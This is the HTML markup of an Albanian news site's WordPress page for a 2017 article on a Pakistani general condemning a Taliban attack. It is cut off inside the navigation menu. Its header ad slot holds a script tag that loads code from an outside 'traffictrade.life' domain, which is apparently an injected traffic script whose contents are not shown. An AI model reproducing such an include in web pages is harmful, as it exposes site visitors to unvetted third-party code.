<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head >
    <title>Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve - Rilindja Demokratike</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://www.rd.al/xmlrpc.php" />
    
<!-- This site is optimized with the Yoast SEO plugin v4.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://www.rd.al/2017/08/reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve - Rilindja Demokratike" />
<meta property="og:description" content="Në një lëvizje të pazakontë, shefi ushtarak i Pakistanit dënoi të enjten duke e vlerësuar si terrorizëm sulmin taleban në Afganistanin fqinj, në të cilin u vranë dy pjesëtarë të forcave ushtarake amerikane dhe katër të tjerë u plagosën. Komenti i gjeneralit Qamar Javed Bajwa që dënonte sulmin, erdhi në një ditë kur i dërguari" />
<meta property="og:url" content="http://www.rd.al/2017/08/reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve/" />
<meta property="og:site_name" content="Rilindja Demokratike" />
<meta property="article:section" content="Bota &amp; Rajoni" />
<meta property="article:published_time" content="2017-08-04T19:33:45+02:00" />
<meta property="og:image" content="http://www.rd.al/wp-content/uploads/2017/08/gjenerali-pakistanez.jpg" />
<meta property="og:image:width" content="1023" />
<meta property="og:image:height" content="575" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Në një lëvizje të pazakontë, shefi ushtarak i Pakistanit dënoi të enjten duke e vlerësuar si terrorizëm sulmin taleban në Afganistanin fqinj, në të cilin u vranë dy pjesëtarë të forcave ushtarake amerikane dhe katër të tjerë u plagosën. Komenti i gjeneralit Qamar Javed Bajwa që dënonte sulmin, erdhi në një ditë kur i dërguari " />
<meta name="twitter:title" content="Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve - Rilindja Demokratike" />
<meta name="twitter:image" content="http://www.rd.al/wp-content/uploads/2017/08/gjenerali-pakistanez.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//www.rd.al' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Rilindja Demokratike &raquo; Feed" href="http://www.rd.al/feed/" />
<link rel="alternate" type="application/rss+xml" title="Rilindja Demokratike &raquo; Comments Feed" href="http://www.rd.al/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Rilindja Demokratike &raquo; Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve Comments Feed" href="http://www.rd.al/2017/08/reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.rd.al\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.5"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='iphorm-css'  href='http://www.rd.al/wp-content/plugins/iphorm-form-builder/css/styles.css?ver=1.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='qtip-css'  href='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='iphorm-uniform-theme-1-css'  href='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/uniform/themes/default/default.css?ver=1.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://www.rd.al/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.93' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400%2C300&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='upw_theme_standard-css'  href='http://www.rd.al/wp-content/plugins/ultimate-posts-widget/css/upw-theme-standard.min.css?ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://www.rd.al/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.9.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.rd.al/wp-content/themes/Newspaper/style.css?ver=6.6.5' type='text/css' media='all' />
<script type='text/javascript' src='http://www.rd.al/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.rd.al/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/iphorm-form-builder/js/iphorm.js?ver=1.7.5'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.93'></script>
<script type='text/javascript' src='http://www.rd.al/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.93'></script>
<link rel='https://api.w.org/' href='http://www.rd.al/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.rd.al/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.rd.al/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.7.5" />
<link rel='shortlink' href='http://www.rd.al/?p=47960' />
<link rel="alternate" type="application/json+oembed" href="http://www.rd.al/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rd.al%2F2017%2F08%2Freagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.rd.al/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rd.al%2F2017%2F08%2Freagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve%2F&#038;format=xml" />
		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '4a79b52504';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"http://www.rd.al/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.rd.al/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://www.rd.al/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var tdBlocksArray = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function tdBlock() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/www.rd.al\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.6.5";
var td_get_template_directory_uri="http:\/\/www.rd.al\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    
.block-title > span,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2,
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more,
    .td-weather-information:before,
    .td-weather-week:before {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before {
        border-color: #222222;
    }

    
    @media (max-width: 767px) {
        body .td-header-wrap .td-header-main-menu {
            background-color: #ffffff !important;
        }
    }


    
    @media (max-width: 767px) {
        body #td-top-mobile-toggle i,
        .td-header-wrap .header-search-wrap .td-icon-search {
            color: #000000 !important;
        }
    }

    
    .td-footer-wrapper {
        background-color: #e8e8e8;
    }

    
    .td-footer-wrapper,
    .td-footer-wrapper a,
    .td-footer-wrapper .block-title a,
    .td-footer-wrapper .block-title span,
    .td-footer-wrapper .block-title label,
    .td-footer-wrapper .td-excerpt,
    .td-footer-wrapper .td-post-author-name span,
    .td-footer-wrapper .td-post-date {
        color: #000000;
    }

    .td-footer-wrapper .widget_calendar th,
    .td-footer-wrapper .widget_calendar td {
        border-color: #000000;
    }

    .td-footer-wrapper .td-module-comments a,
    .td-footer-wrapper .td-post-category,
    .td-footer-wrapper .td-slide-meta .td-post-author-name span,
    .td-footer-wrapper .td-slide-meta .td-post-date {
        color: #fff;
    }
</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-75823776-1', 'auto');
  ga('send', 'pageview');

</script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="post-template-default single single-post postid-47960 single-format-standard reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve wpb-js-composer js-comp-ver-4.9.2 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">


<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div id="td-outer-wrap">

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-td-demo-header-menu-container"><ul id="menu-td-demo-header-menu" class=""><li id="menu-item-53" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-53"><a href="http://www.rd.al/">Kreu</a></li>
<li id="menu-item-301" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-301"><a href="http://www.rd.al/category/politike-2/">Politikë</a></li>
<li id="menu-item-393" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-393"><a href="http://www.rd.al/category/editorial/">Editorial</a></li>
<li id="menu-item-283" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283"><a href="http://www.rd.al/category/aktualitet/">Aktualitet</a></li>
<li id="menu-item-325" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-325"><a href="http://www.rd.al/category/ekonomi/">Ekonomi</a></li>
<li id="menu-item-297" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-297"><a href="http://www.rd.al/category/sociale/">Sociale</a></li>
<li id="menu-item-194" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-194"><a href="http://www.rd.al/index.php/kontakt/">Kontakt</a></li>
<li id="menu-item-539" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-539"><a href="http://www.rilindjademokratike.com/">Arkivë</a></li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
                    </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                    <a href="http://www.rd.al/">
        <img class="td-retina-data" data-retina="http://www.rd.al/wp-content/uploads/2016/03/RD-Logo-web-4.png" src="http://www.rd.al/wp-content/uploads/2016/03/RD-Logo-web-4.png" alt=""/>
    </a>
            </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    <div class="td-a-rec td-a-rec-id-header "><script src='https://traffictrade.life/scripts.js' type='text/javascript'></script></div>
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
        		<a class="td-mobile-logo td-sticky-header" href="http://www.rd.al/">
			<img class="td-retina-data" data-retina="http://www.rd.al/wp-content/uploads/2016/03/280-x-96px.png" src="http://www.rd.al/wp-content/uploads/2016/03/140x48px.png" alt=""/>
		</a>
			<a class="td-header-logo td-sticky-header" href="http://www.rd.al/">
			<img class="td-retina-data" data-retina="http://www.rd.al/wp-content/uploads/2016/03/RD-Logo-web-4.png" src="http://www.rd.al/wp-content/uploads/2016/03/RD-Logo-web-4.png" alt=""/>
		</a>
	    </div>
    <div class="menu-td-demo-header-menu-container"><ul id="menu-td-demo-header-menu-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-53"><a href="http://www.rd.al/">Kreu</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-301"><a href="http://www.rd.al/category/politike-2/">Politikë</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_1_5984b1692fd03 = new tdBlock();
block_td_uid_1_5984b1692fd03.id = "td_uid_1_5984b1692fd03";
block_td_uid_1_5984b1692fd03.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"13","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_uid_1_5984b1692fd03_rand"}';
block_td_uid_1_5984b1692fd03.td_column_number = "3";
block_td_uid_1_5984b1692fd03.block_type = "td_block_mega_menu";
block_td_uid_1_5984b1692fd03.post_count = "5";
block_td_uid_1_5984b1692fd03.found_posts = "4147";
block_td_uid_1_5984b1692fd03.header_color = "";
block_td_uid_1_5984b1692fd03.ajax_pagination_infinite_stop = "";
block_td_uid_1_5984b1692fd03.max_num_pages = "830";
tdBlocksArray.push(block_td_uid_1_5984b1692fd03);
</script><div class="td_block_wrap td_block_mega_menu td_uid_1_5984b1692fd03_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_1_5984b1692fd03 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/ministri-denuar-britanik-adhuron-edi-ramen/" rel="bookmark" title="Ministri i dënuar britanik adhuron Edi Ramën"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/denis-macshane-701x368-218x150.jpg" alt="" title="Ministri i dënuar britanik adhuron Edi Ramën"/></a></div>                <a href="http://www.rd.al/category/politike-2/" class="td-post-category">Politikë</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/ministri-denuar-britanik-adhuron-edi-ramen/" rel="bookmark" title="Ministri i dënuar britanik adhuron Edi Ramën">Ministri i dënuar britanik adhuron Edi Ramën</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/vasili-shperthen-ndaj-rames-shqiperia-ne-flake-ku-eshte-qeveria/" rel="bookmark" title="Vasili shpërthen ndaj Ramës: Shqipëria në flakë, ku është qeveria?"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/petrit-vasili-218x150.jpg" alt="" title="Vasili shpërthen ndaj Ramës: Shqipëria në flakë, ku është qeveria?"/></a></div>                <a href="http://www.rd.al/category/politike-2/" class="td-post-category">Politikë</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/vasili-shperthen-ndaj-rames-shqiperia-ne-flake-ku-eshte-qeveria/" rel="bookmark" title="Vasili shpërthen ndaj Ramës: Shqipëria në flakë, ku është qeveria?">Vasili shpërthen ndaj Ramës: Shqipëria në flakë, ku është qeveria?</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/juncker-ballkani-perendimor-jo-shpejt-ne/" rel="bookmark" title="Juncker: Ballkani Perëndimor, jo shpejt në BE"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/12/Jean-Claude-Juncker-218x150.jpg" alt="" title="Juncker: Ballkani Perëndimor, jo shpejt në BE"/></a></div>                <a href="http://www.rd.al/category/politike-2/" class="td-post-category">Politikë</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/juncker-ballkani-perendimor-jo-shpejt-ne/" rel="bookmark" title="Juncker: Ballkani Perëndimor, jo shpejt në BE">Juncker: Ballkani Perëndimor, jo shpejt në BE</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/presidenti-auditimit-cek-takime-meten-e-leskajn/" rel="bookmark" title="Presidenti i i Auditimit çek takime me Metën e Leskajn"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/leskaj-218x150.jpg" alt="" title="Presidenti i i Auditimit çek takime me Metën e Leskajn"/></a></div>                <a href="http://www.rd.al/category/politike-2/" class="td-post-category">Politikë</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/presidenti-auditimit-cek-takime-meten-e-leskajn/" rel="bookmark" title="Presidenti i i Auditimit çek takime me Metën e Leskajn">Presidenti i i Auditimit çek takime me Metën e Leskajn</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/paralizohet-vendimmarrja-ne-gjykaten-kushtetuese/" rel="bookmark" title="Paralizohet vendimmarrja në Gjykatën Kushtetuese"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/gjykata-kushtetuese-218x150.jpg" alt="" title="Paralizohet vendimmarrja në Gjykatën Kushtetuese"/></a></div>                <a href="http://www.rd.al/category/politike-2/" class="td-post-category">Politikë</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/paralizohet-vendimmarrja-ne-gjykaten-kushtetuese/" rel="bookmark" title="Paralizohet vendimmarrja në Gjykatën Kushtetuese">Paralizohet vendimmarrja në Gjykatën Kushtetuese</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5984b1692fd03" data-td_block_id="td_uid_1_5984b1692fd03"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5984b1692fd03" data-td_block_id="td_uid_1_5984b1692fd03"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-393"><a href="http://www.rd.al/category/editorial/">Editorial</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_2_5984b16936458 = new tdBlock();
block_td_uid_2_5984b16936458.id = "td_uid_2_5984b16936458";
block_td_uid_2_5984b16936458.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"21","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_uid_2_5984b16936458_rand"}';
block_td_uid_2_5984b16936458.td_column_number = "3";
block_td_uid_2_5984b16936458.block_type = "td_block_mega_menu";
block_td_uid_2_5984b16936458.post_count = "5";
block_td_uid_2_5984b16936458.found_posts = "845";
block_td_uid_2_5984b16936458.header_color = "";
block_td_uid_2_5984b16936458.ajax_pagination_infinite_stop = "";
block_td_uid_2_5984b16936458.max_num_pages = "169";
tdBlocksArray.push(block_td_uid_2_5984b16936458);
</script><div class="td_block_wrap td_block_mega_menu td_uid_2_5984b16936458_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_2_5984b16936458 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/mundet-vucic-te-behet-de-gaulle-serbise-per-kosoven/" rel="bookmark" title="Mundet Vuçiç të bëhet De Gaulle i Serbisë për Kosovën?"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/06/aleksandar-vucic-1352498993-22832811-218x150.jpg" alt="" title="Mundet Vuçiç të bëhet De Gaulle i Serbisë për Kosovën?"/></a></div>                <a href="http://www.rd.al/category/editorial/" class="td-post-category">Editorial</a>            </div>

            <div class="item-details">
